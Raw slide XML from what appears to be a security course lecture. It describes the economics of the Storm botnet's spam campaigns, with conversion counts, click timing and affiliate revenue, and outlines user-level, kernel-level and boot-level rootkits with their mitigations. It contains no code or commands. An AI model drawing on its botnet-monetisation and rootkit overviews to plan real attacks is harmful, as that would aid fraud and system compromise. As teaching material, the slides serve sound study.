          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557415" y="5456316"/>
            <a:ext cx="9110585" cy="30028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23CD3BBA-2AFC-44DB-9CE9-B86AABEE388A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096001" y="1364776"/>
            <a:ext cx="1255960" cy="3029803"/>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9819EB5A-E431-43C5-8C36-94450BF51384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557415" y="5621572"/>
            <a:ext cx="9110585" cy="30028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43E01A63-BB8C-4128-84DD-26FD53F38BC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7351961" y="1364776"/>
            <a:ext cx="2547513" cy="3029803"/>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CC0529A8-27A7-4505-BCD4-6E106926215C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557415" y="5842663"/>
            <a:ext cx="9110585" cy="30028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AB798E25-F8D2-4EF4-93BB-D404A0BCBCA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3625795" y="6256606"/>
            <a:ext cx="6273679" cy="549498"/>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774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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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6" presetClass="exit" presetSubtype="21" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertic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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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6" presetClass="exit" presetSubtype="21" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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6" presetClass="exit" presetSubtype="21" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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6" presetClass="exit" presetSubtype="21" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="64" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetID="16" presetClass="entr" presetSubtype="21"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inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7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4949" y="866314"/>
            <a:ext cx="11305104" cy="5125371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1"/>
            <a:ext cx="10515600" cy="870863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Geographic View of Conversions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="6065838"/>
            <a:ext cx="7543801" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>541 binary executions, 28 purchases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24434551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524000" y="1153633"/>
            <a:ext cx="533400" cy="381000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918950" y="65314"/>
            <a:ext cx="9444252" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000" lnSpcReduction="10000"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Time-to-click Distribution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293451" y="751114"/>
            <a:ext cx="7696200" cy="6088222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{231408EF-EBA5-4CB7-A594-45906DF56443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002507" y="2229135"/>
            <a:ext cx="4273209" cy="352112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CCF395D8-8003-46E8-A03B-DC91A3BFC9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7981341" y="664191"/>
            <a:ext cx="1008310" cy="1264694"/>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Speech Bubble: Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36E1E56-4AAB-4B03-8B24-679AF73B88C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7981341" y="3429000"/>
            <a:ext cx="2765622" cy="1211725"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80050"/>
              <a:gd name="adj2" fmla="val 1444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60% of clicks occur within the first 24 hours</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Speech Bubble: Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534412DD-8BFA-4BFB-8020-94FDD484F2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9513625" y="664191"/>
            <a:ext cx="1985750" cy="1211725"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80050"/>
              <a:gd name="adj2" fmla="val 1444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10% of clicks occur after one week!?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266121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Pharmaceutical Revenue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7432343" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>28 purchases in 26 days, average price ~$100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Total: $2,731.88, $140/day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But: only controlled ~1.5% of workers!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$9500/day (and 8500 new bot infections per day)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$3.5M/year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, this is split with the affiliate program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>40% cut for Storm operators via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Glavmed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$1.7M/year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storm: service provider or integrated operation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retail price of spam ~$80 per million</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>350M emails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> $25K</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suggests integrated operation to be profitable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85E1F93A-88CE-4A89-A2E6-8DADFA684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0787" y="1163258"/>
            <a:ext cx="3333750" cy="5238750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Speech Bubble: Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B17AA3D-7CDD-440D-B32E-4AF6E70A90C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9453349" y="272730"/>
            <a:ext cx="2292824" cy="755176"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 29365"/>
              <a:gd name="adj2" fmla="val 2197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Pavel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Vrublevsky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57453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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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8" end="8"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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6" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50"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Spamcraft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: An Inside Look At Spam Campaign Orchestration”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6347" y="1869700"/>
            <a:ext cx="8314120" cy="3965616"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5835316"/>
            <a:ext cx="10515600" cy="9173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Paper takes a broader look at the activities of the Storm botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A14DE2F-780E-4D7F-9080-A1A14FD020DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826199" y="2568338"/>
            <a:ext cx="7991091" cy="509518"/>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E8199E85-FC04-4730-ADDD-4162B3F0CF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826200" y="3252032"/>
            <a:ext cx="7991090" cy="509518"/>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67F918DE-4FDC-4263-8690-EC84E928486A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826200" y="4288915"/>
            <a:ext cx="7991090" cy="509518"/>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D5E5A327-BAFB-433D-BF59-A673024CEB3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826199" y="4977445"/>
            <a:ext cx="7991091" cy="509518"/>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5263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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertic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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertic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8336" y="0"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Duration and Size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7147" y="269456"/>
            <a:ext cx="7218948" cy="6478712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81543CE3-4D80-41A8-8D32-70C65A1BEF50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9955716" y="427630"/>
            <a:ext cx="1394671" cy="1499845"/>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7F871B7B-08A6-40B9-83D3-59C386F0A12C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522468" y="575641"/>
            <a:ext cx="1433341" cy="670856"/>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9798E066-1BD0-43D6-85CD-88DBC8B325E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7894903" y="4617653"/>
            <a:ext cx="416583" cy="427470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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5781F101-EB79-4234-84CF-7D981925C7E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522468" y="2330403"/>
            <a:ext cx="1433341" cy="427470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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0021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5411-156E-474C-9336-2B8C9E01AD6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of Rootkits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440A6ADF-7937-48E0-8739-5390AE121AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798205" y="1825624"/>
            <a:ext cx="8555594" cy="4777767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-level rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replaces system utilities like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replaces key system libraries like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Annoying, but detectable by AV and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> like tripwire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernel-level rootkits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modify or replace key OS kernel functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes implemented as a kernel module or device driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigation: kernel-driver signing (required by 64-bit Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replace the boot loader or Master Boot Record (MBR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loads before the OS and modifies it as it loads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hypervisor-level rootkits, firmware/BIOS rootkits, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE0E98AE-8673-4CE5-BD99-9B1CB5EF27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90713">
            <a:off x="9641162" y="82131"/>
            <a:ext cx="2295126" cy="2295126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999437EA-C608-4FB3-992B-197926B8CC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2468193" y="1797635"/>
            <a:ext cx="0" cy="4805756"/>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173201B-8559-4F01-A83B-50303E4029E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519082" y="1690688"/>
            <a:ext cx="1732544" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Low privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to develop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
